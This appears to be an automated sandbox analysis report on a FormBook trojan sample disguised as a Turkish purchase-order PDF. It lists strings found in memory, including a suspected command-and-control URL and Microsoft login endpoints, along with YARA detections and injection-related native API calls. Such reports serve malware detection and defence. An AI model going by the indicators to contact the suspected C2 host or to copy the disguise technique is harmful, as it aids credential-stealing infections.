            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: unregmp2.exe, 00000009.00000003.1722342341.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000005DDC000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.00000000033BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0042B463 NtClose,7_2_0042B463
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12B60 NtClose,LdrInitializeThunk,7_2_01B12B60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01B12DF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01B12C70
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B135C0 NtCreateMutant,LdrInitializeThunk,7_2_01B135C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B14340 NtSetContextThread,7_2_01B14340
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B14650 NtSuspendThread,7_2_01B14650
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12BA0 NtEnumerateValueKey,7_2_01B12BA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12B80 NtQueryInformationFile,7_2_01B12B80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12BF0 NtAllocateVirtualMemory,7_2_01B12BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12BE0 NtQueryValueKey,7_2_01B12BE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12AB0 NtWaitForSingleObject,7_2_01B12AB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12AF0 NtWriteFile,7_2_01B12AF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12AD0 NtReadFile,7_2_01B12AD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12DB0 NtEnumerateKey,7_2_01B12DB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12DD0 NtDelayExecution,7_2_01B12DD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12D30 NtUnmapViewOfSection,7_2_01B12D30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12D10 NtMapViewOfSection,7_2_01B12D10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12D00 NtSetInformationFile,7_2_01B12D00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12CA0 NtQueryInformationToken,7_2_01B12CA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12CF0 NtOpenProcess,7_2_01B12CF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12CC0 NtQueryVirtualMemory,7_2_01B12CC0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12C00 NtQueryInformationProcess,7_2_01B12C00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12C60 NtCreateKey,7_2_01B12C60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12FB0 NtResumeThread,7_2_01B12FB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12FA0 NtQuerySection,7_2_01B12FA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12F90 NtProtectVirtualMemory,7_2_01B12F90
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12FE0 NtCreateFile,7_2_01B12FE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12F30 NtCreateSection,7_2_01B12F30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12F60 NtCreateProcessEx,7_2_01B12F60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12EA0 NtAdjustPrivilegesToken,7_2_01B12EA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12E80 NtReadVirtualMemory,7_2_01B12E80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12EE0 NtQueueApcThread,7_2_01B12EE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12E30 NtWriteVirtualMemory,7_2_01B12E30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B13090 NtSetValueKey,7_2_01B13090
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B13010 NtOpenDirectoryObject,7_2_01B13010
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B139B0 NtGetContextThread,7_2_01B139B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B13D10 NtOpenProcessToken,7_2_01B13D10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B13D70 NtOpenThread,7_2_01B13D70
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D44650 NtSuspendThread,LdrInitializeThunk,9_2_04D44650
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D44340 NtSetContextThread,LdrInitializeThunk,9_2_04D44340
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04D42CA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04D42C70
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42C60 NtCreateKey,LdrInitializeThunk,9_2_04D42C60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42DD0 NtDelayExecution,LdrInitializeThunk,9_2_04D42DD0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04D42DF0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04D42D10
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04D42D30
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04D42EE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04D42E80
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42FE0 NtCreateFile,LdrInitializeThunk,9_2_04D42FE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42FB0 NtResumeThread,LdrInitializeThunk,9_2_04D42FB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42F30 NtCreateSection,LdrInitializeThunk,9_2_04D42F30
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42AD0 NtReadFile,LdrInitializeThunk,9_2_04D42AD0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42AF0 NtWriteFile,LdrInitializeThunk,9_2_04D42AF0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04D42BF0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04D42BE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04D42BA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42B60 NtClose,LdrInitializeThunk,9_2_04D42B60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D435C0 NtCreateMutant,LdrInitializeThunk,9_2_04D435C0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D439B0 NtGetContextThread,LdrInitializeThunk,9_2_04D439B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42CC0 NtQueryVirtualMemory,9_2_04D42CC0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42CF0 NtOpenProcess,9_2_04D42CF0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42C00 NtQueryInformationProcess,9_2_04D42C00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42DB0 NtEnumerateKey,9_2_04D42DB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42D00 NtSetInformationFile,9_2_04D42D00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42EA0 NtAdjustPrivilegesToken,9_2_04D42EA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42E30 NtWriteVirtualMemory,9_2_04D42E30
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42F90 NtProtectVirtualMemory,9_2_04D42F90
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42FA0 NtQuerySection,9_2_04D42FA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42F60 NtCreateProcessEx,9_2_04D42F60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42AB0 NtWaitForSingleObject,9_2_04D42AB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42B80 NtQueryInformationFile,9_2_04D42B80
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43090 NtSetValueKey,9_2_04D43090
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43010 NtOpenDirectoryObject,9_2_04D43010
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43D70 NtOpenThread,9_2_04D43D70
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43D10 NtOpenProcessToken,9_2_04D43D10
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE8140 NtAllocateVirtualMemory,9_2_00BE8140
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7D00 NtCreateFile,9_2_00BE7D00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7E60 NtReadFile,9_2_00BE7E60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7FE0 NtClose,9_2_00BE7FE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7F40 NtDeleteFile,9_2_00BE7F40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_011DD4FC0_2_011DD4FC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D18800_2_075D1880
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D44B00_2_075D44B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D44A00_2_075D44A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D5FC00_2_075D5FC0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D5B880_2_075D5B88
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075DAAE00_2_075DAAE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D18700_2_075D1870
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D48E80_2_075D48E8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D68980_2_075D6898
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004010D07_2_004010D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004168DE7_2_004168DE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004168E37_2_004168E3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0042D8B37_2_0042D8B3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004101C37_2_004101C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040E2437_2_0040E243
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004012607_2_00401260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004032107_2_00403210
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00401B8B7_2_00401B8B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00401B907_2_00401B90
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004024E07_2_004024E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040FF9B7_2_0040FF9B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040279D7_2_0040279D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004027A07_2_004027A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040FFA37_2_0040FFA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA01AA7_2_01BA01AA
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B941A27_2_01B941A2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B981CC7_2_01B981CC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD01007_2_01AD0100
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7A1187_2_01B7A118
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B681587_2_01B68158
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B720007_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA03E67_2_01BA03E6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE3F07_2_01AEE3F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9A3527_2_01B9A352
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B602C07_2_01B602C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B802747_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA05917_2_01BA0591
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE05357_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8E4F67_2_01B8E4F6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B844207_2_01B84420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B924467_2_01B92446
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADC7C07_2_01ADC7C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE07707_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B047507_2_01B04750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFC6E07_2_01AFC6E0
